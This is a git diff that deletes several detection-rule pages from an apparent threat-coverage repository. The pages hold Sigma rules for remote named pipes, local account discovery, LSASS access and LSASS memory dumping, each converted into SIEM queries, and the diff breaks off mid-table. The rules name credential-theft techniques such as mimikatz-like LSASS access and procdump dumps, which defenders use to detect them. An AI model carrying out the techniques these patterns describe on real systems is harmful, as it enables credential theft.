-| **Description**          | This detection excludes known namped pipes accessible remotely and notify on newly observed ones, may help to detect lateral movement and remote exec using named pipes |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0008: Lateral Movement](https://attack.mitre.org/tactics/TA0008)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1077: Windows Admin Shares](https://attack.mitre.org/techniques/T1077)</li></ul>  |
-| **Data Needed**          |  There is no documented Data Needed for this Detection Rule yet  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | high |
-| **False Positives**      | <ul><li>update the excluded named pipe to filter out any newly observed legit named pipe</li></ul>  |
-| **Development Status**   |  Development Status wasn't defined for this Detection Rule yet  |
-| **References**           | <ul><li>[https://twitter.com/menasec1/status/1104489274387451904](https://twitter.com/menasec1/status/1104489274387451904)</li></ul>  |
-| **Author**               | Samir Bousseaden |
-| Other Tags           | <ul><li>attack.t1021.002</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: First Time Seen Remote Named Pipe
-id: 52d8b0c6-53d6-439a-9e41-52ad442ad9ad
-description: This detection excludes known namped pipes accessible remotely and notify on newly observed ones, may help to detect lateral movement and remote exec using named pipes
-author: Samir Bousseaden
-date: 2019/04/03
-references:
-    - https://twitter.com/menasec1/status/1104489274387451904
-tags:
-    - attack.lateral_movement
-    - attack.t1077
-    - attack.t1021.002
-logsource:
-    product: windows
-    service: security
-    description: 'The advanced audit policy setting "Object Access > Audit Detailed File Share" must be configured for Success/Failure'
-detection:
-    selection1:
-        EventID: 5145
-        ShareName: \\*\IPC$
-    selection2:
-        EventID: 5145
-        ShareName: \\*\IPC$
-        RelativeTargetName:
-            - 'atsvc'
-            - 'samr'
-            - 'lsarpc'
-            - 'winreg'
-            - 'netlogon'
-            - 'srvsvc'
-            - 'protected_storage'
-            - 'wkssvc'
-            - 'browser'
-            - 'netdfs'
-            - 'svcctl'
-            - 'spoolss'
-            - 'ntsvcs'
-            - 'LSM_API_service'
-            - 'HydraLsPipe'
-            - 'TermSrv_API_service'
-            - 'MsFteWds'
-    condition: selection1 and not selection2
-falsepositives:
-    - update the excluded named pipe to filter out any newly observed legit named pipe
-level: high
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Security | where {(($_.ID -eq "5145" -and $_.message -match "ShareName.*\\.*\\IPC$") -and  -not ($_.ID -eq "5145" -and $_.message -match "ShareName.*\\.*\\IPC$" -and ($_.message -match "atsvc" -or $_.message -match "samr" -or $_.message -match "lsarpc" -or $_.message -match "winreg" -or $_.message -match "netlogon" -or $_.message -match "srvsvc" -or $_.message -match "protected_storage" -or $_.message -match "wkssvc" -or $_.message -match "browser" -or $_.message -match "netdfs" -or $_.message -match "svcctl" -or $_.message -match "spoolss" -or $_.message -match "ntsvcs" -or $_.message -match "LSM_API_service" -or $_.message -match "HydraLsPipe" -or $_.message -match "TermSrv_API_service" -or $_.message -match "MsFteWds"))) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.channel:"Security" AND (winlog.event_id:"5145" AND winlog.event_data.ShareName.keyword:\\*\\IPC$) AND (NOT (winlog.event_id:"5145" AND winlog.event_data.ShareName.keyword:\\*\\IPC$ AND RelativeTargetName:("atsvc" OR "samr" OR "lsarpc" OR "winreg" OR "netlogon" OR "srvsvc" OR "protected_storage" OR "wkssvc" OR "browser" OR "netdfs" OR "svcctl" OR "spoolss" OR "ntsvcs" OR "LSM_API_service" OR "HydraLsPipe" OR "TermSrv_API_service" OR "MsFteWds"))))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/52d8b0c6-53d6-439a-9e41-52ad442ad9ad <<EOF
-{
-  "metadata": {
-    "title": "First Time Seen Remote Named Pipe",
-    "description": "This detection excludes known namped pipes accessible remotely and notify on newly observed ones, may help to detect lateral movement and remote exec using named pipes",
-    "tags": [
-      "attack.lateral_movement",
-      "attack.t1077",
-      "attack.t1021.002"
-    ],
-    "query": "(winlog.channel:\"Security\" AND (winlog.event_id:\"5145\" AND winlog.event_data.ShareName.keyword:\\\\*\\\\IPC$) AND (NOT (winlog.event_id:\"5145\" AND winlog.event_data.ShareName.keyword:\\\\*\\\\IPC$ AND RelativeTargetName:(\"atsvc\" OR \"samr\" OR \"lsarpc\" OR \"winreg\" OR \"netlogon\" OR \"srvsvc\" OR \"protected_storage\" OR \"wkssvc\" OR \"browser\" OR \"netdfs\" OR \"svcctl\" OR \"spoolss\" OR \"ntsvcs\" OR \"LSM_API_service\" OR \"HydraLsPipe\" OR \"TermSrv_API_service\" OR \"MsFteWds\"))))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.channel:\"Security\" AND (winlog.event_id:\"5145\" AND winlog.event_data.ShareName.keyword:\\\\*\\\\IPC$) AND (NOT (winlog.event_id:\"5145\" AND winlog.event_data.ShareName.keyword:\\\\*\\\\IPC$ AND RelativeTargetName:(\"atsvc\" OR \"samr\" OR \"lsarpc\" OR \"winreg\" OR \"netlogon\" OR \"srvsvc\" OR \"protected_storage\" OR \"wkssvc\" OR \"browser\" OR \"netdfs\" OR \"svcctl\" OR \"spoolss\" OR \"ntsvcs\" OR \"LSM_API_service\" OR \"HydraLsPipe\" OR \"TermSrv_API_service\" OR \"MsFteWds\"))))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'First Time Seen Remote Named Pipe'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-((EventID:"5145" AND ShareName.keyword:\\*\\IPC$) AND (NOT (EventID:"5145" AND ShareName.keyword:\\*\\IPC$ AND RelativeTargetName:("atsvc" "samr" "lsarpc" "winreg" "netlogon" "srvsvc" "protected_storage" "wkssvc" "browser" "netdfs" "svcctl" "spoolss" "ntsvcs" "LSM_API_service" "HydraLsPipe" "TermSrv_API_service" "MsFteWds"))))
-```
-
-
-### splunk
-    
-```
-(source="WinEventLog:Security" (EventCode="5145" ShareName="\\*\\IPC$") NOT (EventCode="5145" ShareName="\\*\\IPC$" (RelativeTargetName="atsvc" OR RelativeTargetName="samr" OR RelativeTargetName="lsarpc" OR RelativeTargetName="winreg" OR RelativeTargetName="netlogon" OR RelativeTargetName="srvsvc" OR RelativeTargetName="protected_storage" OR RelativeTargetName="wkssvc" OR RelativeTargetName="browser" OR RelativeTargetName="netdfs" OR RelativeTargetName="svcctl" OR RelativeTargetName="spoolss" OR RelativeTargetName="ntsvcs" OR RelativeTargetName="LSM_API_service" OR RelativeTargetName="HydraLsPipe" OR RelativeTargetName="TermSrv_API_service" OR RelativeTargetName="MsFteWds")))
-```
-
-
-### logpoint
-    
-```
-(event_source="Microsoft-Windows-Security-Auditing" (event_id="5145" ShareName="\\*\\IPC$")  -(event_id="5145" ShareName="\\*\\IPC$" RelativeTargetName IN ["atsvc", "samr", "lsarpc", "winreg", "netlogon", "srvsvc", "protected_storage", "wkssvc", "browser", "netdfs", "svcctl", "spoolss", "ntsvcs", "LSM_API_service", "HydraLsPipe", "TermSrv_API_service", "MsFteWds"]))
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*(?:.*(?=.*5145)(?=.*\\.*\IPC\$)))(?=.*(?!.*(?:.*(?=.*5145)(?=.*\\.*\IPC\$)(?=.*(?:.*atsvc|.*samr|.*lsarpc|.*winreg|.*netlogon|.*srvsvc|.*protected_storage|.*wkssvc|.*browser|.*netdfs|.*svcctl|.*spoolss|.*ntsvcs|.*LSM_API_service|.*HydraLsPipe|.*TermSrv_API_service|.*MsFteWds))))))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_local_system_owner_account_discovery.md b/Atomic_Threat_Coverage/Detection_Rules/win_local_system_owner_account_discovery.md
deleted file mode 100644
index a3fea86..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_local_system_owner_account_discovery.md
+++ /dev/null
@@ -1,216 +0,0 @@
-| Title                    | Local Accounts Discovery       |
-|:-------------------------|:------------------|
-| **Description**          | Local accounts, System Owner/User discovery using operating systems utilities |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0007: Discovery](https://attack.mitre.org/tactics/TA0007)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1033: System Owner/User Discovery](https://attack.mitre.org/techniques/T1033)</li><li>[T1087: Account Discovery](https://attack.mitre.org/techniques/T1087)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              | <ul><li>[T1033: System Owner/User Discovery](../Triggers/T1033.md)</li></ul>  |
-| **Severity Level**       | low |
-| **False Positives**      | <ul><li>Legitimate administrator or user enumerates local users for legitimate reason</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.yaml](https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.yaml)</li></ul>  |
-| **Author**               | Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Local Accounts Discovery
-id: 502b42de-4306-40b4-9596-6f590c81f073
-status: experimental
-description: Local accounts, System Owner/User discovery using operating systems utilities
-author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community
-date: 2019/10/21
-modified: 2019/11/04
-references:
-    - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.yaml
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection_1:
-      - Image|endswith: '\whoami.exe'
-      - Image|endswith: '\wmic.exe'
-        CommandLine|contains|all:
-            - 'useraccount'
-            - 'get'
-      - Image|endswith: 
-            - '\quser.exe'
-            - '\qwinsta.exe'
-      - Image|endswith: '\cmdkey.exe'
-        CommandLine|contains: '/list'
-      - Image|endswith: '\cmd.exe'
-        CommandLine|contains|all: 
-            - '/c'
-            - 'dir '
-            - '\Users\'
-    filter_1:
-        CommandLine|contains:
-            - ' rmdir '       # don't match on 'dir'   "C:\Windows\System32\cmd.exe" /q /c rmdir /s /q "C:\Users\XX\AppData\Local\Microsoft\OneDrive\19.232.1124.0005"
-    selection_2:
-        Image|endswith:
-            - '\net.exe'
-            - '\net1.exe'
-        CommandLine|contains: 'user'
-    filter_2:
-        CommandLine|contains:
-            - '/domain'       # local account discovery only
-            - '/add'          # discovery only
-            - '/delete'       # discovery only
-            - '/active'       # discovery only
-            - '/expires'      # discovery only
-            - '/passwordreq'  # discovery only
-            - '/scriptpath'   # discovery only
-            - '/times'        # discovery only
-            - '/workstations' # discovery only
-    condition: (selection_1 and not filter_1) or ( selection_2 and not filter_2)
-fields:
-    - Image
-    - CommandLine
-    - User
-    - LogonGuid
-    - Hashes
-    - ParentProcessGuid
-    - ParentCommandLine
-falsepositives:
-     - Legitimate administrator or user enumerates local users for legitimate reason
-level: low
-tags:
-    - attack.discovery
-    - attack.t1033
-    - attack.t1087
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and ((($_.message -match "Image.*.*\\whoami.exe" -or ($_.message -match "Image.*.*\\wmic.exe" -and $_.message -match "CommandLine.*.*useraccount.*" -and $_.message -match "CommandLine.*.*get.*") -or ($_.message -match "Image.*.*\\quser.exe" -or $_.message -match "Image.*.*\\qwinsta.exe") -or ($_.message -match "Image.*.*\\cmdkey.exe" -and $_.message -match "CommandLine.*.*/list.*") -or ($_.message -match "Image.*.*\\cmd.exe" -and $_.message -match "CommandLine.*.*/c.*" -and $_.message -match "CommandLine.*.*dir .*" -and $_.message -match "CommandLine.*.*\\Users\\.*")) -and  -not (($_.message -match "CommandLine.*.* rmdir .*"))) -or ((($_.message -match "Image.*.*\\net.exe" -or $_.message -match "Image.*.*\\net1.exe") -and $_.message -match "CommandLine.*.*user.*") -and  -not (($_.message -match "CommandLine.*.*/domain.*" -or $_.message -match "CommandLine.*.*/add.*" -or $_.message -match "CommandLine.*.*/delete.*" -or $_.message -match "CommandLine.*.*/active.*" -or $_.message -match "CommandLine.*.*/expires.*" -or $_.message -match "CommandLine.*.*/passwordreq.*" -or $_.message -match "CommandLine.*.*/scriptpath.*" -or $_.message -match "CommandLine.*.*/times.*" -or $_.message -match "CommandLine.*.*/workstations.*"))))) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(((winlog.event_data.Image.keyword:*\\whoami.exe OR (winlog.event_data.Image.keyword:*\\wmic.exe AND winlog.event_data.CommandLine.keyword:*useraccount* AND winlog.event_data.CommandLine.keyword:*get*) OR winlog.event_data.Image.keyword:(*\\quser.exe OR *\\qwinsta.exe) OR (winlog.event_data.Image.keyword:*\\cmdkey.exe AND winlog.event_data.CommandLine.keyword:*\/list*) OR (winlog.event_data.Image.keyword:*\\cmd.exe AND winlog.event_data.CommandLine.keyword:*\/c* AND winlog.event_data.CommandLine.keyword:*dir\ * AND winlog.event_data.CommandLine.keyword:*\\Users\\*)) AND (NOT (winlog.event_data.CommandLine.keyword:(*\ rmdir\ *)))) OR ((winlog.event_data.Image.keyword:(*\\net.exe OR *\\net1.exe) AND winlog.event_data.CommandLine.keyword:*user*) AND (NOT (winlog.event_data.CommandLine.keyword:(*\/domain* OR *\/add* OR *\/delete* OR *\/active* OR *\/expires* OR *\/passwordreq* OR *\/scriptpath* OR *\/times* OR *\/workstations*)))))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/502b42de-4306-40b4-9596-6f590c81f073 <<EOF
-{
-  "metadata": {
-    "title": "Local Accounts Discovery",
-    "description": "Local accounts, System Owner/User discovery using operating systems utilities",
-    "tags": [
-      "attack.discovery",
-      "attack.t1033",
-      "attack.t1087"
-    ],
-    "query": "(((winlog.event_data.Image.keyword:*\\\\whoami.exe OR (winlog.event_data.Image.keyword:*\\\\wmic.exe AND winlog.event_data.CommandLine.keyword:*useraccount* AND winlog.event_data.CommandLine.keyword:*get*) OR winlog.event_data.Image.keyword:(*\\\\quser.exe OR *\\\\qwinsta.exe) OR (winlog.event_data.Image.keyword:*\\\\cmdkey.exe AND winlog.event_data.CommandLine.keyword:*\\/list*) OR (winlog.event_data.Image.keyword:*\\\\cmd.exe AND winlog.event_data.CommandLine.keyword:*\\/c* AND winlog.event_data.CommandLine.keyword:*dir\\ * AND winlog.event_data.CommandLine.keyword:*\\\\Users\\\\*)) AND (NOT (winlog.event_data.CommandLine.keyword:(*\\ rmdir\\ *)))) OR ((winlog.event_data.Image.keyword:(*\\\\net.exe OR *\\\\net1.exe) AND winlog.event_data.CommandLine.keyword:*user*) AND (NOT (winlog.event_data.CommandLine.keyword:(*\\/domain* OR *\\/add* OR *\\/delete* OR *\\/active* OR *\\/expires* OR *\\/passwordreq* OR *\\/scriptpath* OR *\\/times* OR *\\/workstations*)))))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(((winlog.event_data.Image.keyword:*\\\\whoami.exe OR (winlog.event_data.Image.keyword:*\\\\wmic.exe AND winlog.event_data.CommandLine.keyword:*useraccount* AND winlog.event_data.CommandLine.keyword:*get*) OR winlog.event_data.Image.keyword:(*\\\\quser.exe OR *\\\\qwinsta.exe) OR (winlog.event_data.Image.keyword:*\\\\cmdkey.exe AND winlog.event_data.CommandLine.keyword:*\\/list*) OR (winlog.event_data.Image.keyword:*\\\\cmd.exe AND winlog.event_data.CommandLine.keyword:*\\/c* AND winlog.event_data.CommandLine.keyword:*dir\\ * AND winlog.event_data.CommandLine.keyword:*\\\\Users\\\\*)) AND (NOT (winlog.event_data.CommandLine.keyword:(*\\ rmdir\\ *)))) OR ((winlog.event_data.Image.keyword:(*\\\\net.exe OR *\\\\net1.exe) AND winlog.event_data.CommandLine.keyword:*user*) AND (NOT (winlog.event_data.CommandLine.keyword:(*\\/domain* OR *\\/add* OR *\\/delete* OR *\\/active* OR *\\/expires* OR *\\/passwordreq* OR *\\/scriptpath* OR *\\/times* OR *\\/workstations*)))))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Local Accounts Discovery'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}Hit on {{_source.@timestamp}}:\n            Image = {{_source.Image}}\n      CommandLine = {{_source.CommandLine}}\n             User = {{_source.User}}\n        LogonGuid = {{_source.LogonGuid}}\n           Hashes = {{_source.Hashes}}\nParentProcessGuid = {{_source.ParentProcessGuid}}\nParentCommandLine = {{_source.ParentCommandLine}}================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(((Image.keyword:*\\whoami.exe OR (Image.keyword:*\\wmic.exe AND CommandLine.keyword:*useraccount* AND CommandLine.keyword:*get*) OR Image.keyword:(*\\quser.exe *\\qwinsta.exe) OR (Image.keyword:*\\cmdkey.exe AND CommandLine.keyword:*\/list*) OR (Image.keyword:*\\cmd.exe AND CommandLine.keyword:*\/c* AND CommandLine.keyword:*dir * AND CommandLine.keyword:*\\Users\\*)) AND (NOT (CommandLine.keyword:(* rmdir *)))) OR ((Image.keyword:(*\\net.exe *\\net1.exe) AND CommandLine.keyword:*user*) AND (NOT (CommandLine.keyword:(*\/domain* *\/add* *\/delete* *\/active* *\/expires* *\/passwordreq* *\/scriptpath* *\/times* *\/workstations*)))))
-```
-
-
-### splunk
-    
-```
-(((Image="*\\whoami.exe" OR (Image="*\\wmic.exe" CommandLine="*useraccount*" CommandLine="*get*") OR (Image="*\\quser.exe" OR Image="*\\qwinsta.exe") OR (Image="*\\cmdkey.exe" CommandLine="*/list*") OR (Image="*\\cmd.exe" CommandLine="*/c*" CommandLine="*dir *" CommandLine="*\\Users\\*")) NOT ((CommandLine="* rmdir *"))) OR (((Image="*\\net.exe" OR Image="*\\net1.exe") CommandLine="*user*") NOT ((CommandLine="*/domain*" OR CommandLine="*/add*" OR CommandLine="*/delete*" OR CommandLine="*/active*" OR CommandLine="*/expires*" OR CommandLine="*/passwordreq*" OR CommandLine="*/scriptpath*" OR CommandLine="*/times*" OR CommandLine="*/workstations*")))) | table Image,CommandLine,User,LogonGuid,Hashes,ParentProcessGuid,ParentCommandLine
-```
-
-
-### logpoint
-    
-```
-(event_id="1" (((Image="*\\whoami.exe" OR (Image="*\\wmic.exe" CommandLine="*useraccount*" CommandLine="*get*") OR Image IN ["*\\quser.exe", "*\\qwinsta.exe"] OR (Image="*\\cmdkey.exe" CommandLine="*/list*") OR (Image="*\\cmd.exe" CommandLine="*/c*" CommandLine="*dir *" CommandLine="*\\Users\\*"))  -(CommandLine IN ["* rmdir *"])) OR ((Image IN ["*\\net.exe", "*\\net1.exe"] CommandLine="*user*")  -(CommandLine IN ["*/domain*", "*/add*", "*/delete*", "*/active*", "*/expires*", "*/passwordreq*", "*/scriptpath*", "*/times*", "*/workstations*"]))))
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?:.*(?:.*(?=.*(?:.*(?:.*.*\whoami\.exe|.*(?:.*(?=.*.*\wmic\.exe)(?=.*.*useraccount.*)(?=.*.*get.*))|.*(?:.*.*\quser\.exe|.*.*\qwinsta\.exe)|.*(?:.*(?=.*.*\cmdkey\.exe)(?=.*.*/list.*))|.*(?:.*(?=.*.*\cmd\.exe)(?=.*.*/c.*)(?=.*.*dir .*)(?=.*.*\Users\\.*)))))(?=.*(?!.*(?:.*(?=.*(?:.*.* rmdir .*))))))|.*(?:.*(?=.*(?:.*(?=.*(?:.*.*\net\.exe|.*.*\net1\.exe))(?=.*.*user.*)))(?=.*(?!.*(?:.*(?=.*(?:.*.*/domain.*|.*.*/add.*|.*.*/delete.*|.*.*/active.*|.*.*/expires.*|.*.*/passwordreq.*|.*.*/scriptpath.*|.*.*/times.*|.*.*/workstations.*))))))))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_lsass_access_non_system_account.md b/Atomic_Threat_Coverage/Detection_Rules/win_lsass_access_non_system_account.md
deleted file mode 100644
index dfde546..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_lsass_access_non_system_account.md
+++ /dev/null
@@ -1,186 +0,0 @@
-| Title                    | LSASS Access from Non System Account       |
-|:-------------------------|:------------------|
-| **Description**          | Detects potential mimikatz-like tools accessing LSASS from non system account |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0006: Credential Access](https://attack.mitre.org/tactics/TA0006)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1003: OS Credential Dumping](https://attack.mitre.org/techniques/T1003)</li></ul>  |
-| **Data Needed**          |  There is no documented Data Needed for this Detection Rule yet  |
-| **Trigger**              | <ul><li>[T1003: OS Credential Dumping](../Triggers/T1003.md)</li></ul>  |
-| **Severity Level**       | critical |
-| **False Positives**      | <ul><li>Unknown</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://github.com/Cyb3rWard0g/ThreatHunter-Playbook/tree/master/playbooks/windows/06_credential_access/T1003_credential_dumping/lsass_access_non_system_account.md](https://github.com/Cyb3rWard0g/ThreatHunter-Playbook/tree/master/playbooks/windows/06_credential_access/T1003_credential_dumping/lsass_access_non_system_account.md)</li></ul>  |
-| **Author**               | Roberto Rodriguez @Cyb3rWard0g |
-| Other Tags           | <ul><li>attack.t1003.001</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: LSASS Access from Non System Account
-id: 962fe167-e48d-4fd6-9974-11e5b9a5d6d1
-description: Detects potential mimikatz-like tools accessing LSASS from non system account
-status: experimental
-date: 2019/06/20
-modified: 2019/11/10
-author: Roberto Rodriguez @Cyb3rWard0g
-references:
-    - https://github.com/Cyb3rWard0g/ThreatHunter-Playbook/tree/master/playbooks/windows/06_credential_access/T1003_credential_dumping/lsass_access_non_system_account.md
-tags:
-    - attack.credential_access
-    - attack.t1003
-    - attack.t1003.001
-logsource:
-    product: windows
-    service: security
-detection:
-    selection:
-        EventID:
-            - 4663
-            - 4656
-        ObjectType: 'Process'
-        ObjectName|endswith: '\lsass.exe'
-    filter:
-        SubjectUserName|endswith: '$'
-    condition: selection and not filter
-fields:
-    - ComputerName
-    - ObjectName
-    - SubjectUserName
-    - ProcessName
-falsepositives:
-    - Unknown
-level: critical
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Security | where {((($_.ID -eq "4663" -or $_.ID -eq "4656") -and $_.message -match "ObjectType.*Process" -and $_.message -match "ObjectName.*.*\\lsass.exe") -and  -not ($_.message -match "SubjectUserName.*.*$")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.channel:"Security" AND (winlog.event_id:("4663" OR "4656") AND winlog.event_data.ObjectType:"Process" AND winlog.event_data.ObjectName.keyword:*\\lsass.exe) AND (NOT (winlog.event_data.SubjectUserName.keyword:*$)))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/962fe167-e48d-4fd6-9974-11e5b9a5d6d1 <<EOF
-{
-  "metadata": {
-    "title": "LSASS Access from Non System Account",
-    "description": "Detects potential mimikatz-like tools accessing LSASS from non system account",
-    "tags": [
-      "attack.credential_access",
-      "attack.t1003",
-      "attack.t1003.001"
-    ],
-    "query": "(winlog.channel:\"Security\" AND (winlog.event_id:(\"4663\" OR \"4656\") AND winlog.event_data.ObjectType:\"Process\" AND winlog.event_data.ObjectName.keyword:*\\\\lsass.exe) AND (NOT (winlog.event_data.SubjectUserName.keyword:*$)))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.channel:\"Security\" AND (winlog.event_id:(\"4663\" OR \"4656\") AND winlog.event_data.ObjectType:\"Process\" AND winlog.event_data.ObjectName.keyword:*\\\\lsass.exe) AND (NOT (winlog.event_data.SubjectUserName.keyword:*$)))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'LSASS Access from Non System Account'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}Hit on {{_source.@timestamp}}:\n   ComputerName = {{_source.ComputerName}}\n     ObjectName = {{_source.ObjectName}}\nSubjectUserName = {{_source.SubjectUserName}}\n    ProcessName = {{_source.ProcessName}}================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-((EventID:("4663" "4656") AND ObjectType:"Process" AND ObjectName.keyword:*\\lsass.exe) AND (NOT (SubjectUserName.keyword:*$)))
-```
-
-
-### splunk
-    
-```
-(source="WinEventLog:Security" ((EventCode="4663" OR EventCode="4656") ObjectType="Process" ObjectName="*\\lsass.exe") NOT (SubjectUserName="*$")) | table ComputerName,ObjectName,SubjectUserName,ProcessName
-```
-
-
-### logpoint
-    
-```
-(event_source="Microsoft-Windows-Security-Auditing" (event_id IN ["4663", "4656"] ObjectType="Process" ObjectName="*\\lsass.exe")  -(SubjectUserName="*$"))
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*(?:.*(?=.*(?:.*4663|.*4656))(?=.*Process)(?=.*.*\lsass\.exe)))(?=.*(?!.*(?:.*(?=.*.*\$)))))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_lsass_dump.md b/Atomic_Threat_Coverage/Detection_Rules/win_lsass_dump.md
deleted file mode 100644
index 58d0fc9..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_lsass_dump.md
+++ /dev/null
@@ -1,189 +0,0 @@
-| Title                    | LSASS Memory Dumping       |
-|:-------------------------|:------------------|
-| **Description**          | Detect creation of dump files containing the memory space of lsass.exe, which contains sensitive credentials. Identifies usage of Sysinternals procdump.exe to export the memory space of lsass.exe which contains sensitive credentials. |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0006: Credential Access](https://attack.mitre.org/tactics/TA0006)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1003: OS Credential Dumping](https://attack.mitre.org/techniques/T1003)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              | <ul><li>[T1003: OS Credential Dumping](../Triggers/T1003.md)</li></ul>  |
-| **Severity Level**       | high |
-| **False Positives**      | <ul><li>Unlikely</li></ul>  |
-| **Development Status**   | experimental |
